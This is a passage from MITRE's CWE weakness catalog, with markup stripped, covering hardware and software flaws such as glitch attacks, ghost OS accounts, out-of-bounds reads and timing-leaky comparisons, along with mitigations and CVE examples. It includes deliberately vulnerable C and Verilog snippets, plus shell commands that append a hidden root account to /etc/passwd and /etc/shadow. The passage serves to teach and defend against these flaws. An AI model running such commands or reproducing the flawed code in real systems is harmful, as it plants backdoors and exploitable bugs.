that target this DVFS [REF-1081] [REF-1082]. During the design and implementation phases, one needs to check if the interface to this power management feature is available from unprivileged SW (CWE-1256), which would make the attack very easy. + + + + + + Architecture and Design + Implementation + + At the circuit-level, using Tunable Replica Circuits (TRCs) or special flip-flops such as Razor flip-flops helps mitigate glitch attacks. Working at the SoC or platform base, level sensors may be implemented to detect glitches. Implementing redundancy in security-sensitive code (e.g., where checks are performed)also can help with mitigation of glitch attacks. + + + + + + Below is a representative snippet of C code that is part of the secure-boot flow. A signature of the runtime-firmware image is calculated and compared against a golden value. If the signatures match, the bootloader loads runtime firmware. If there is no match, an error halt occurs. If the underlying hardware executing this code does not contain any circuitry or sensors to detect voltage or clock glitches, an attacker might launch a fault-injection attack right when the signature check is happening (at the location marked with the comment), causing a bypass of the signature-checking process. + + ... + if (signature_matches) // <-Glitch Here + { + + load_runtime_firmware(); + + } + else + { + + do_not_load_runtime_firmware(); + + } + + ... + + After bypassing secure boot, an attacker can gain access to system assets to which the attacker should not have access. + + If the underlying hardware detects a voltage or clock glitch, the information can be used to prevent the glitch from being successful. + + + + + + CVE-2019-17391 + Lack of anti-glitch protections allows an attacker to launch a physical attack to bypass the secure boot and read protected eFuses. + https://www.cve.org/CVERecord?id=CVE-2019-17391 + + + + Power + Clock + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Functional_Areas + + + CWE Content Team + MITRE + 2021-10-28 + updated Description, Detection_Factors, Name, References, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Parbati K. Manna + Intel Corporation + 2021-10-18 + provided detection methods + + Missing Protection Against Voltage and Clock Glitches + Missing or Improperly Implemented Protection Against Voltage and Clock Glitches + + + + The security-sensitive hardware module contains semiconductor defects. + + A semiconductor device can fail for various reasons. While some are manufacturing and packaging defects, the rest are due to prolonged use or usage under extreme conditions. Some mechanisms that lead to semiconductor defects include encapsulation failure, die-attach failure, wire-bond failure, bulk-silicon defects, oxide-layer faults, aluminum-metal faults (including electromigration, corrosion of aluminum, etc.), and thermal/electrical stress. These defects manifest as faults on chip-internal signals or registers, have the effect of inputs, outputs, or intermediate signals being always 0 or always 1, and do not switch as expected. If such faults occur in security-sensitive hardware modules, the security objectives of the hardware module may be compromised. + + + + + + + + + + + + + Manufacturing + May be introduced due to issues in the manufacturing environment or improper handling of components, for example. + + + Operation + May be introduced by improper handling or usage outside of rated operating environments (temperature, humidity, etc.) + + + + + Availability + Access Control + DoS: Instability + + + + + Testing + + While semiconductor-manufacturing companies implement several mechanisms to continuously improve the semiconductor manufacturing process to ensure reduction of defects, some defects can only be fixed after manufacturing. Post-manufacturing testing of silicon die is critical. Fault models such as stuck-at-0 or stuck-at-1 must be used to develop post-manufacturing test cases and achieve good coverage. Once the silicon packaging is done, extensive post-silicon testing must be performed to ensure that hardware logic implementing security functionalities is defect-free. + + + + Operation + + Operating the hardware outside device specification, such as at extremely high temperatures, voltage, etc., accelerates semiconductor degradation and results in defects. When these defects manifest as faults in security-critical, hardware modules, it results in compromise of security guarantees. Thus, operating the device within the specification is important. + + + + + + The network-on-chip implements a firewall for access control to peripherals from all IP cores capable of mastering transactions. + + A manufacturing defect in this logic manifests itself as a logical fault, which always sets the output of the filter to "allow" access. + + Post-manufacture testing must be performed to ensure that hardware logic implementing security functionalities is defect-free. + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Modes_of_Introduction, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Description, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application's model of the OS's state is inconsistent with the OS's actual state. + + Many products provide web-based applications or other interfaces for managing the underlying operating system. This is common with cloud, network access devices, home networking, and other systems. When the management tool does not accurately represent what is in the OS - such as user accounts - then the administrator might not see suspicious activities that would be noticed otherwise. + For example, numerous systems utilize a web + front-end for administrative control. They also offer + the ability to add, alter, and drop users with various + privileges as it relates to the functionality of the + system. A potential architectural weakness may exist + where the user information reflected in the web + interface does not mirror the users in the underlying + operating system. Many web UI or REST APIs use the + underlying operating system for authentication; the + system's logic may also track an additional set of + user capabilities within configuration files + and datasets for authorization capabilities. When + there is a discrepancy between the user information in + the UI or REST API's interface system and the + underlying operating system's user listing, this may + introduce a weakness into the system. For example, if an + attacker compromises the OS and adds a new user + account - a "ghost" account - then the attacker could escape detection if + the management tool does not list the newly-added + account. + This discrepancy could be exploited in several ways: + + A rogue admin could insert a new account into a system that will + persist if they are terminated or wish to take action on a system that + cannot be directly associated with them. + An attacker can leverage a separate command injection attack available through the web interface to insert a ghost account with shell privileges such as ssh. + An attacker can leverage existing web interface APIs, manipulated in such a way that a new user is inserted into the operating system, and the user web account is either partially created or not at all. + An attacker could create an admin + account which is viewable by an administrator, + use this account to create the ghost account, + delete logs and delete the first created admin + account. + + Many of these attacker scenarios can be + realized by leveraging separate vulnerabilities + related to XSS, command injection, authentication + bypass, or logic flaws on the various systems. + + + + + + + + + + + + + Ghost in the Shell + + + + + Architecture and Design + The design might assume that the underlying OS does not change. + + + Implementation + Assumptions about the underlying OS might be hard-coded into the application or otherwise in external data stores in a way that is not updated when the OS's state changes. + + + + + Access Control + Varies by Context + + + Accountability + Hide Activities + + + Other + Unexpected State + + + + + Architecture and Design + + Ensure that the admin tool refreshes its model of the underlying OS on a regular basis, and note any inconsistencies with configuration files or other data sources that are expected to have the same data. + + + + + + Suppose that an attacker successfully gains root privileges on a Linux system and adds a new 'user2' account: + + echo "user2:x:0:0::/root:/" >> /etc/passwd; + echo + "user2:\$6\$IdvyrM6VJnG8Su5U\$1gmW3Nm.IO4vxTQDQ1C8urm72JCadOHZQwqiH/nRtL8dPY80xS4Ovsv5bPCMWnXKKWwmsocSWXupUf17LB3oS.:17256:0:99999:7:::" >> /etc/shadow; + + This new user2 account would not be noticed on the web interface, if the interface does not refresh its data of available users. + + It could be argued that for this specific example, an attacker with root privileges would be likely to compromise the admin tool or otherwise feed it with false data. However, this example shows how the discrepancy in critical data can help attackers to escape detection. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Tony Martin + 2019-06-06 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product reads data past the end, or before the beginning, of the intended buffer. + Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. A crash can occur when the code reads a variable amount of data and assumes that a sentinel exists to stop the read operation, such as a NUL in a string. The expected sentinel might not be located in the out-of-bounds memory, causing excessive data to be read, leading to a segmentation fault or a buffer overflow. The product may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent read operation then produces undefined or unexpected results. + + + + + + + + + Primary + + + + + + + + + + Implementation + + + + + Confidentiality + Read Memory + + + Confidentiality + Bypass Protection Mechanism + By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + To reduce the likelihood of introducing an out-of-bounds read, ensure that you validate and ensure correct calculations for any length argument, buffer size calculation, or offset. Be especially careful of relying on a sentinel (i.e. special character such as NUL) in untrusted inputs. + + + + Architecture and Design + Language Selection + Use a language that provides appropriate memory abstractions. + + + + + In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method + + int getValueFromArray(int *array, int len, int index) { + + int value; + + // check that the array index is less than the maximum + + + // length of the array + if (index < len) { + + + // get the value at the specified index of the array + value = array[index]; + } + // if array index is invalid then output error message + + + // and return value indicating error + else {printf("Value is: %d\n", array[index]);value = -1;} + return value; + } + + However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. + + + ... + + // check that the array index is within the correct + + + // range of values for the array + if (index >= 0 && index < len) { + ... + + + + + + CVE-2020-11899 + Out-of-bounds read in IP stack used in embedded systems, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-11899 + + + CVE-2014-0160 + Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. + https://www.cve.org/CVERecord?id=CVE-2014-0160 + + + CVE-2018-10887 + Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) + https://www.cve.org/CVERecord?id=CVE-2018-10887 + + + CVE-2009-2523 + Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). + https://www.cve.org/CVERecord?id=CVE-2009-2523 + + + CVE-2018-16069 + Chain: series of floating-point precision errors + (CWE-1339) in a web browser rendering engine causes out-of-bounds read + (CWE-125), giving access to cross-origin data + https://www.cve.org/CVERecord?id=CVE-2018-16069 + + + CVE-2004-0112 + out-of-bounds read due to improper length check + https://www.cve.org/CVERecord?id=CVE-2004-0112 + + + CVE-2004-0183 + packet with large number of specified elements cause out-of-bounds read. + https://www.cve.org/CVERecord?id=CVE-2004-0183 + + + CVE-2004-0221 + packet with large number of specified elements cause out-of-bounds read. + https://www.cve.org/CVERecord?id=CVE-2004-0221 + + + CVE-2004-0184 + out-of-bounds read, resultant from integer underflow + https://www.cve.org/CVERecord?id=CVE-2004-0184 + + + CVE-2004-1940 + large length value causes out-of-bounds read + https://www.cve.org/CVERecord?id=CVE-2004-1940 + + + CVE-2004-0421 + malformed image causes out-of-bounds read + https://www.cve.org/CVERecord?id=CVE-2004-0421 + + + CVE-2008-4113 + OS kernel trusts userland-supplied length value, allowing reading of sensitive information + https://www.cve.org/CVERecord?id=CVE-2008-4113 + + + + + Out-of-bounds Read + + + ARR30-C + Do not form or use out-of-bounds pointers or array subscripts + Imprecise + + + ARR38-C + Guarantee that library functions do not form invalid pointers + Imprecise + + + EXP39-C + Do not access a variable through a pointer of an incompatible type + Imprecise + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + Imprecise + + + STR32-C + Do not pass a non-null-terminated character sequence to a library function that expects a string + CWE More Abstract + + + SFP8 + Faulty Buffer Access + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Observed_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Description + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-09-19 + updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other. + + In highly distributed environments, or on systems with distinct physical components that operate independently, there is often a need for each component to store and update its own local copy of key data such as state or cache, so that all components have the same "view" of the overall system and operate in a coordinated fashion. For example, users of a social media service or a massively multiplayer online game might be using their own personal computers while also interacting with different physical hosts in a globally distributed service, but all participants must be able to have the same "view" of the world. Alternately, a processor's Memory Management Unit (MMU) might have "shadow" MMUs to distribute its workload, and all shadow MMUs are expected to have the same accessible ranges of memory. + In such environments, it becomes critical for + the product to ensure that this "shared state" is + consistently modified across all distributed systems. + If state is not consistently maintained across all + systems, then critical transactions might take place + out of order, or some users might not get the same + data as other users. When this inconsistency affects + correctness of operations, it can introduce + vulnerabilities in mechanisms that depend on + consistent state. + + + + + + + + + + + + + + Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. + Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Issues related to state and cache - creation, + preservation, and update - are a significant gap in + CWE that is expected to be addressed in future + versions. It likely has relationships to concurrency + and synchronization, incorrect behavior order, and + other areas that already have some coverage in CWE, + although the focus has typically been on independent + processes on the same operating system - not on + independent systems that are all a part of a larger + system-of-systems. + + + + + CWE Content Team + CWE Content Team + 2020-02-13 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's architecture mirrors regions without ensuring that their contents always stay in sync. + + Having mirrored regions with different values might result in the exposure of sensitive information or possibly system compromise. + In the interest of increased performance, one might need to duplicate a resource. A cache memory is a common example of this concept, which keeps a "local" copy of a data element in the high speed cache memory. Unfortunately, this speed improvement comes with a downside, since the product needs to ensure that the local copy always mirrors the original copy truthfully. If they get out of sync, the computational result is no longer true. + During hardware design, memory is not the only item which gets mirrored. There are many other entities that get mirrored, as well: registers, memory regions, and, in some cases, even whole computational units. For example, within a multi-core processor, if all memory accesses for each and every core goes through a single Memory-Management Unit (MMU) then the MMU will become a performance bottleneck. In such cases, duplicating local MMUs that will serve only a subset of the cores rather than all of them may resolve the performance issue. These local copies are also called "shadow copies" or "mirrored copies." + If the original resource never changed, local duplicate copies getting out of sync would never be an issue. However, the values of the original copy will sometimes change. When the original copy changes, the mirrored copies must also change, and change fast. + This situation of shadow-copy-possibly-out-of-sync-with-original-copy might occur as a result of multiple scenarios, including the following: + + + After the values in the original copy change, due to some reason the original copy does not send the "update" request to its shadow copies. + After the values in the original copy change, the original copy dutifully sends the "update" request to its shadow copies, but due to some reason the shadow copy does not "execute" this update request. + After the values in the original copy change, the original copy sends the "update" request to its shadow copies, and the shadow copy executes this update request faithfully. However, during the small time period when the original copy has "new" values and the shadow copy is still holding the "old" values, an attacker can exploit the old values. Then it becomes a race condition between the attacker and the update process of who can reach the target, shadow copy first, and, if the attacker reaches first, the attacker wins. + The attacker might send a "spoofed" update request to the target shadow copy, pretending that this update request is coming from the original copy. This spoofed request might cause the targeted shadow copy to update its values to some attacker-friendly values, while the original copies remain unchanged by the attacker. + Suppose a situation where the original copy has a system of reverting back to its original value if it does not hear back from all the shadow copies that such copies have successfully completed the update request. In such a case, an attack might occur as follows: (1) the original copy might send an update request; (2) the shadow copy updates it; (3) the shadow copy sends back the successful completion message; (4) through a separate issue, the attacker is able to intercept the shadow copy's completion message. In this case, the original copy thinks that the update did not succeed, hence it reverts to its original value. Now there is a situation where the original copy has the "old" value, and the shadow copy has the "new" value. + + + + + + + + + + + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Varies by Context + + + + + Architecture and Design + + Whenever there are multiple, physically different copies of the same value that might change and the process to update them is not instantaneous and atomic, it is impossible to assert that the original and shadow copies will always be in sync - there will always be a time period when they are out of sync. To mitigate the consequential risk, the recommendations essentially are: + + Make this out-of-sync time period as small as possible, and + Make the update process as robust as possible. + + + Moderate + + + + + Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. + Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Issues related to state and cache - creation, preservation, and update - are a significant gap in CWE that is expected to be addressed in future versions. It has relationships to concurrency and synchronization, incorrect behavior order, and other areas that already have some coverage in CWE, although the focus has typically been on independent processes on the same operating system - not on independent systems that are all a part of a larger system-of-systems. + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Research_Gaps + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory. + + CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it. + + + + + + + + + + + + + + Architecture and Design + + + + + Confidentiality + Integrity + Execute Unauthorized Code or Commands + + + + + Architecture and Design + + Implement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit). + + + + Integration + + If MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation. + + + + + + MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions. + + The optional MPU is not configured. + + If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-13 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse. + + Fuses are often used to store secret data, including security configuration data. When not blown, a fuse is considered to store a logic 0, and, when blown, it indicates a logic 1. Fuses are generally considered to be one-directional, i.e., once blown to logic 1, it cannot be reset to logic 0. However, if the logic used to determine system-security state (by leveraging the values sensed from the fuses) uses negative logic, an attacker might blow the fuse and drive the system to an insecure state. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Authorization + Bypass Protection Mechanism + Gain Privileges or Assume Identity + + + Availability + DoS: Crash, Exit, or Restart + + + Confidentiality + Read Memory + + + Integrity + Modify Memory + Execute Unauthorized Code or Commands + + + + + Architecture and Design + Logic should be designed in a way that blown fuses do not put the product into an insecure state that can be leveraged by an attacker. + + + + + + A chip implements a secure boot and uses the sensed value of a fuse + "do_secure_boot" to determine whether to perform a secure boot or not. If this fuse + value is "0", the system performs secure boot. Otherwise, it does not perform secure + boot. + An attacker blows the "do_secure_boot" fuse to "1". After reset, the attacker loads a custom + bootloader, and, since the fuse value is now "1", the system does not perform secure boot, + and the attacker can execute their custom firmware image. + Since by default, a fuse-configuration value is a "0", an attacker can blow it to a "1" with + inexpensive hardware. + If the logic is reversed, an attacker cannot easily reset the fuse. Note that, with + specialized and expensive equipment, an attacker with full physical access might be able to "unblow" the fuse + value to a "0". + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes. + + Comparison logic is used to compare a variety of objects including passwords, Message + Authentication Codes (MACs), and responses to verification challenges. When comparison logic is + implemented at a finer granularity (e.g., byte-by-byte comparison) and breaks in the case of a + comparison failure, an attacker can exploit this implementation to identify when exactly + the failure occurred. With multiple attempts, the attacker may be able to guesses the correct + password/response to challenge and elevate their privileges. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Authorization + Bypass Protection Mechanism + + + + + Implementation + + The hardware designer should ensure that comparison logic is implemented so as to compare in one operation instead in smaller chunks. + + + + + + Consider an example hardware module that checks a user-provided password to grant access to a user. The user-provided password is compared against a golden value in a byte-by-byte manner. + + always_comb @ (posedge clk) + + begin + + assign check_pass[3:0] = 4'b0; + for (i = 0; i < 4; i++) begin + + if (entered_pass[(i*8 - 1) : i] eq golden_pass([i*8 - 1) : i]) + + assign check_pass[i] = 1; + continue; + + else + + assign check_pass[i] = 0; + break; + + end + + assign grant_access = (check_pass == 4'b1111) ? 1'b1: 1'b0; + + end + + Since the code breaks on an incorrect entry of password, an attacker can guess the correct password for that byte-check iteration with few repeat attempts. + To fix this weakness, either the comparison of the entire string should be done all at once, or the attacker is not given an indication whether pass or fail happened by allowing the comparison to run through all bits before the grant_access signal is set. + + always_comb @ (posedge clk) + begin + + assign check_pass[3:0] = 4'b0; + for (i = 0; i < 4; i++) begin + + if (entered_pass[(i*8 - 1) : i] eq golden_pass([i*8 -1) : i]) + + assign check_pass[i] = 1; + continue; + + else + + assign check_pass[i] = 0; + continue; + + end + + assign grant_access = (check_pass == 4'b1111) ? 1'b1: 1'b0; + + end + + + + + + CVE-2019-10482 + Smartphone OS uses comparison functions that are not in constant time, allowing side channels + https://www.cve.org/CVERecord?id=CVE-2019-10482 + + + CVE-2014-0984 + Password-checking function in router terminates validation of a password entry when it encounters the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack. + https://www.cve.org/CVERecord?id=CVE-2014-0984 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A device's 